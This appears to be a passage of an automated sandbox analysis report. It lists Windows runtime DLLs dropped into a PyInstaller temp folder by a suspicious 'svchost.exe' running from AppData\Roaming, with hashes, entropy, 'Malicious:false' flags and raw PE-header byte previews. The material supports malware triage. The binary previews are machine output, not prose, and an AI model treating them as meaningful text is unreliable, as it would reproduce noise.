                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...S.v............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....S.v.........@...T...T.......S.v.........d...............S.v.....................RSDS..pS...Z4Yr.E@......api-ms-win-core-localization-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................S.v.....v.......;...;...(.......................<...f.......................5...]...................!...I...q...................N.............../...j.............../...^.................../...\...................8...`...........
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-memory-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.101895292899441
                          Encrypted:false
                          SSDEEP:384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH
                          MD5:D500D9E24F33933956DF0E26F087FD91
                          SHA1:6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0
                          SHA-256:BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
                          SHA-512:C89023EB98BF29ADEEBFBCB570427B6DF301DE3D27FF7F4F0A098949F987F7C192E23695888A73F1A2019F1AF06F2135F919F6C606A07C8FA9F07C00C64A34B5
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....%(...........!......................... ...............................0............@.............................l............ ..................8=..............T............................................................................text...l........................... ..`.rsrc........ ......................@..@......%(........:...T...T.........%(........d.................%(....................RSDS.~....%.T.....CO....api-ms-win-core-memory-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......l....edata... ..`....rsrc$01....` .......rsrc$02......................%(....................(...h...........)...P...w...................C...g...................%...P...........B...g...................4...[...|...................=...................................api-ms-win-core-memory-l1-1-0.dl
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-namedpipe-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.16337963516533
                          Encrypted:false
                          SSDEEP:192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB
                          MD5:6F6796D1278670CCE6E2D85199623E27
                          SHA1:8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3
                          SHA-256:C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
                          SHA-512:6E7B134CA930BB33D2822677F31ECA1CB6C1DFF55211296324D2EA9EBDC7C01338F07D22A10C5C5E1179F14B1B5A4E3B0BAFB1C8D39FCF1107C57F9EAF063A7B
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L... ..............!......................... ...............................0.......-....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.... ...........=...T...T....... ...........d............... .......................RSDS...IK..XM.&......api-ms-win-core-namedpipe-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................ .......................(...P...x...............:...w...............O...y...............&...W...............=...j.......................api-ms-win-core-namedpipe-l1-1-0.dll.ConnectNamedPipe.kernel32.ConnectNamedPipe.CreateNamedP
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-processenvironment-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19248
                          Entropy (8bit):7.073730829887072
                          Encrypted:false
                          SSDEEP:192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
                          MD5:5F73A814936C8E7E4A2DFD68876143C8
                          SHA1:D960016C4F553E461AFB5B06B039A15D2E76135E
                          SHA-256:96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
                          SHA-512:77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...).r............!......................... ...............................0.......:....@.............................G............ ..................0=..............T............................................................................text...G........................... ..`.rsrc........ ......................@..@....).r.........F...T...T.......).r.........d...............).r.....................RSDS.6..~x.......'......api-ms-win-core-processenvironment-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......G....edata... ..`....rsrc$01....` .......rsrc$02........).r.....................(...|.......B...............$...M...{...............P...................6...k.............../...(...e...............=...f...............8...q...............!...T............... ...........................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-processthreads-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19392
                          Entropy (8bit):7.082421046253008
                          Encrypted:false
                          SSDEEP:384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
                          MD5:A2D7D7711F9C0E3E065B2929FF342666
                          SHA1:A17B1F36E73B82EF9BFB831058F187535A550EB8
                          SHA-256:9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
                          SHA-512:D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......l.....@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@................B...T...T...................d.......................................RSDS..t........=j.......api-ms-win-core-processthreads-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................1...1...(...........K...x...............,...`...................C...q...............'...N...y..............."...I...{...............B...p...............,...c...............H...x...................9...S...p.......
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-processthreads-l1-1-1.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.1156948849491055
                          Encrypted:false
                          SSDEEP:384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
                          MD5:D0289835D97D103BAD0DD7B9637538A1
                          SHA1:8CEEBE1E9ABB0044808122557DE8AAB28AD14575
                          SHA-256:91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
                          SHA-512:97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....9.............!......................... ...............................0......k.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....9..........B...T...T........9..........d................9......................RSDS&.n....5..l....)....api-ms-win-core-processthreads-l1-1-1.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............9......................(...`...........-...l..........."...W...................N...................P...............F...q...............3...r...................................api-ms-win-core-processthreads-l1-1-1.dll.FlushInstr
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-profile-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):17712
                          Entropy (8bit):7.187691342157284
                          Encrypted:false
                          SSDEEP:192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
                          MD5:FEE0926AA1BF00F2BEC9DA5DB7B2DE56
                          SHA1:F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
                          SHA-256:8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
                          SHA-512:0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....&............!......................... ...............................0......0.....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....&.........;...T...T........&.........d................&.....................RSDS...O.""#.n....D:....api-ms-win-core-profile-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................&.....<...............(...0...8...w......._...........api-ms-win-core-profile-l1-1-0.dll.QueryPerformanceCounter.kernel32.QueryPerformanceCounter.QueryPerformanceFrequency.kernel32.QueryPerformanceFrequency....................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-rtlsupport-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):17720
                          Entropy (8bit):7.19694878324007
                          Encrypted:false
                          SSDEEP:384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
                          MD5:FDBA0DB0A1652D86CD471EAA509E56EA
                          SHA1:3197CB45787D47BAC80223E3E98851E48A122EFA
                          SHA-256:2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
                          SHA-512:E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......(...........!......................... ...............................0......}"....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.......(........>...T...T..........(........d..................(....................RSDS?.L.N.o.....=.......api-ms-win-core-rtlsupport-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................(....F...............(...4...@...~...........l.................api-ms-win-core-rtlsupport-l1-1-0.dll.RtlCaptureContext.ntdll.RtlCaptureContext.RtlCaptureStackBackTrace.ntdll.RtlCaptureStackBackTrace.RtlUnwind.ntdll.RtlUnwind.
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-string-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.137724132900032
                          Encrypted:false
                          SSDEEP:384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
                          MD5:12CC7D8017023EF04EBDD28EF9558305
                          SHA1:F859A66009D1CAAE88BF36B569B63E1FBDAE9493
                          SHA-256:7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
                          SHA-512:F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....R............!......................... ...............................0.......\....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......R.........:...T...T.........R.........d.................R.....................RSDS..D..a..1.f....7....api-ms-win-core-string-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02......................R.....x...............(...H...h...............)...O...x...........................>...i...........................api-ms-win-core-string-l1-1-0.dll.CompareStringEx.kernel32.CompareStringEx.CompareStringOrdinal.kernel32.Compare
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-synch-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):20280
                          Entropy (8bit):7.04640581473745
                          Encrypted:false
                          SSDEEP:384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
                          MD5:71AF7ED2A72267AAAD8564524903CFF6
                          SHA1:8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
                          SHA-256:5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
                          SHA-512:7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......2...........!......................... ...............................0............@.............................V............ ..................8=..............T............................................................................text...V........................... ..`.rsrc........ ......................@..@.......2........9...T...T..........2........d..................2....................RSDS...z..C...+Q_.....api-ms-win-core-synch-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg.......V....edata... ..`....rsrc$01....` .......rsrc$02.......................2............)...)...(.......p.......1...c...................!...F...m...............$...X...........$...[.......................@...i...............!...Q.......................[...............7...........O...................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-synch-l1-2-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.138910839042951
                          Encrypted:false
                          SSDEEP:384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
                          MD5:0D1AA99ED8069BA73CFD74B0FDDC7B3A
                          SHA1:BA1F5384072DF8AF5743F81FD02C98773B5ED147
                          SHA-256:30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
                          SHA-512:6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...X*uY...........!......................... ...............................0......3.....@.............................v............ ..................8=..............T............................................................................text...v........................... ..`.rsrc........ ......................@..@....X*uY........9...T...T.......X*uY........d...............X*uY....................RSDS.V..B...`..S3.....api-ms-win-core-synch-l1-2-0.pdb............T....rdata..T........rdata$zzzdbg.......v....edata... ..`....rsrc$01....` .......rsrc$02....................X*uY....................(...l...........R...................W...............&...b...............$...W.......6...w...............;...|...............H...................A.....................................api-ms-win-core-synch-
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-sysinfo-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19248
                          Entropy (8bit):7.072555805949365
                          Encrypted:false
                          SSDEEP:384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
                          MD5:19A40AF040BD7ADD901AA967600259D9
                          SHA1:05B6322979B0B67526AE5CD6E820596CBE7393E4
                          SHA-256:4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
                          SHA-512:5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....C=...........!......................... ...............................0............@.............................E............ ..................0=..............T............................................................................text...E........................... ..`.rsrc........ ......................@..@......C=........;...T...T.........C=........d.................C=....................RSDS....T.>eD.#|.../....api-ms-win-core-sysinfo-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......E....edata... ..`....rsrc$01....` .......rsrc$02......................C=....................(...........:...i...............N...................7...s...............+...M...r.............../...'...V...............:...k...................X............... ...?...d..............."...................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-timezone-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18224
                          Entropy (8bit):7.17450177544266
                          Encrypted:false
                          SSDEEP:384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
                          MD5:BABF80608FD68A09656871EC8597296C
                          SHA1:33952578924B0376CA4AE6A10B8D4ED749D10688
                          SHA-256:24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
                          SHA-512:3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....Y.x...........!......................... ...............................0......}3....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....Y.x........<...T...T........Y.x........d................Y.x....................RSDS.^.b. .t.H.a.......api-ms-win-core-timezone-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................Y.x....................(...L...p...........5...s...........+...i...................U...............I.........................api-ms-win-core-timezone-l1-1-0.dll.FileTimeToSystemTime.kernel32.FileTimeToSystemTime.GetDynamicTimeZ
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-util-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.1007227686954275
                          Encrypted:false
                          SSDEEP:192:pePWIghWG4U9wluZo123Ouo+Uggs/nGfe4pBjSbKT8wuxWh0txKdmVWQ4CWnFnwQ:pYWPhWFS0i00GftpBj7DudemJlP552
                          MD5:0F079489ABD2B16751CEB7447512A70D
                          SHA1:679DD712ED1C46FBD9BC8615598DA585D94D5D87
                          SHA-256:F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
                          SHA-512:92D64299EBDE83A4D7BE36F07F65DD868DA2765EB3B39F5128321AFF66ABD66171C7542E06272CB958901D403CCF69ED716259E0556EE983D2973FAA03C55D3E
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....f............!......................... ...............................0......`k....@.............................9............ ..................8=..............T............................................................................text...)........................... ..`.rsrc........ ......................@..@......f.........8...T...T.........f.........d.................f.....................RSDS*...$.L.Rm..l.....api-ms-win-core-util-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg.......9....edata... ..`....rsrc$01....` .......rsrc$02..........f.....J...................,...@...o...................j...}.........................api-ms-win-core-util-l1-1-0.dll.Beep.kernel32.Beep.DecodePointer.kernel32.DecodePointer.DecodeSystemPointer.kernel32.DecodeSystemPointer.EncodePointer.kernel3
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-conio-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19256
                          Entropy (8bit):7.088693688879585
                          Encrypted:false
                          SSDEEP:384:8WPhWz4Ri00GftpBjDb7bemHlndanJ7DW:Fm0oiV7beV
                          MD5:6EA692F862BDEB446E649E4B2893E36F
                          SHA1:84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD
                          SHA-256:9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
                          SHA-512:9661C135F50000E0018B3E5C119515CFE977B2F5F88B0F5715E29DF10517B196C81694D074398C99A572A971EC843B3676D6A831714AB632645ED25959D5E3E7
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v..............................8...d...d..................d......................................RSDS....<....2..u....api-ms-win-crt-conio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...............T...............(.......................>...w.........../...W...p...........................,...L...l.......................,...L...m...............t...........'...^...............P...g...........................$...=...
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-convert-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):22328
                          Entropy (8bit):6.929204936143068
                          Encrypted:false
                          SSDEEP:384:EuydWPhW7snhi00GftpBjd6t/emJlDbN:3tnhoi6t/eAp
                          MD5:72E28C902CD947F9A3425B19AC5A64BD
                          SHA1:9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7
                          SHA-256:3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
                          SHA-512:58AB6FEDCE2F8EE0970894273886CB20B10D92979B21CDA97AE0C41D0676CC0CD90691C58B223BCE5F338E0718D1716E6CE59A106901FE9706F85C3ACF7855FF
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....NE............!.........................0...............................@............@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v....................NE.........:...d...d........NE.........d................NE.....................RSDS..e.7P.g^j..[....api-ms-win-crt-convert-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.....................NE.............z...z...8... .......(...C...^...y...........................1...N...k...............................*...E...`...y...............................5...R...o.......................,...M...n...........
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-environment-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18736
                          Entropy (8bit):7.078409479204304
                          Encrypted:false
                          SSDEEP:192:bWIghWGd4edXe123Ouo+Uggs/nGfe4pBjSXXmv5Wh0txKdmVWQ4SWEApkqnajPBZ:bWPhWqXYi00GftpBjBemPl1z6h2
                          MD5:AC290DAD7CB4CA2D93516580452EDA1C
                          SHA1:FA949453557D0049D723F9615E4F390010520EDA
                          SHA-256:C0D75D1887C32A1B1006B3CFFC29DF84A0D73C435CDCB404B6964BE176A61382
                          SHA-512:B5E2B9F5A9DD8A482169C7FC05F018AD8FE6AE27CB6540E67679272698BFCA24B2CA5A377FA61897F328B3DEAC10237CAFBD73BC965BF9055765923ABA9478F8
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....jU............!......................... ...............................0......G.....@............................."............ ..................0=..............T............................................................................text...2........................... ..`.rsrc........ ......................@..@v....................jU.........>...d...d........jU.........d................jU.....................RSDSu..1.N....R.s,"\....api-ms-win-crt-environment-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg......."....edata... ..`....rsrc$01....` .......rsrc$02.................jU.....................8...............C...d...........................3...O...l....................... .......5...Z...w.......................)...F...a...........................................................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-filesystem-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):20280
                          Entropy (8bit):7.085387497246545
                          Encrypted:false
                          SSDEEP:384:sq6nWm5C1WPhWFK0i00GftpBjB1UemKklUG+zIOd/:x6nWm5CiooiKeZnbd/
                          MD5:AEC2268601470050E62CB8066DD41A59
                          SHA1:363ED259905442C4E3B89901BFD8A43B96BF25E4
                          SHA-256:7633774EFFE7C0ADD6752FFE90104D633FC8262C87871D096C2FC07C20018ED2
                          SHA-512:0C14D160BFA3AC52C35FF2F2813B85F8212C5F3AFBCFE71A60CCC2B9E61E51736F0BF37CA1F9975B28968790EA62ED5924FAE4654182F67114BD20D8466C4B8F
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......h...........!......................... ...............................0......I.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v......................h........=...d...d..........h........d..................h....................RSDS.....a.'..G...A.....api-ms-win-crt-filesystem-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................h............A...A...8...<...@...........$...=...V...q...................)...M...q......................./...O...o...........................7...X...v...........................6...U...r.......................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-heap-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19256
                          Entropy (8bit):7.060393359865728
                          Encrypted:false
                          SSDEEP:192:+Y3vY17aFBR4WIghWG4U9CedXe123Ouo+Uggs/nGfe4pBjSbGGAPWh0txKdmVWQC:+Y3e9WPhWFsXYi00GftpBjfemnlP55s
                          MD5:93D3DA06BF894F4FA21007BEE06B5E7D
                          SHA1:1E47230A7EBCFAF643087A1929A385E0D554AD15
                          SHA-256:F5CF623BA14B017AF4AEC6C15EEE446C647AB6D2A5DEE9D6975ADC69994A113D
                          SHA-512:72BD6D46A464DE74A8DAC4C346C52D068116910587B1C7B97978DF888925216958CE77BE1AE049C3DCCF5BF3FFFB21BC41A0AC329622BC9BBC190DF63ABB25C6
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...J.o ...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................J.o ........7...d...d.......J.o ........d...............J.o ....................RSDSq.........pkQX[....api-ms-win-crt-heap-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........J.o ....6...............(...........c...................S.......................1...V...y.......................<...c...........................U...z...............:...u...................&...E...p.......................,...U...
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-locale-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.13172731865352
                          Encrypted:false
                          SSDEEP:192:fiWIghWGZirX+4z123Ouo+Uggs/nGfe4pBjS/RFcpOWh0txKdmVWQ4GWs8ylDikh:aWPhWjO4Ri00GftpBjZOemSXlvNQ0
                          MD5:A2F2258C32E3BA9ABF9E9E38EF7DA8C9
                          SHA1:116846CA871114B7C54148AB2D968F364DA6142F
                          SHA-256:565A2EEC5449EEEED68B430F2E9B92507F979174F9C9A71D0C36D58B96051C33
                          SHA-512:E98CBC8D958E604EFFA614A3964B3D66B6FC646BDCA9AA679EA5E4EB92EC0497B91485A40742F3471F4FF10DE83122331699EDC56A50F06AE86F21FAD70953FE
                          Malicious:false
                          Reputation:unknown
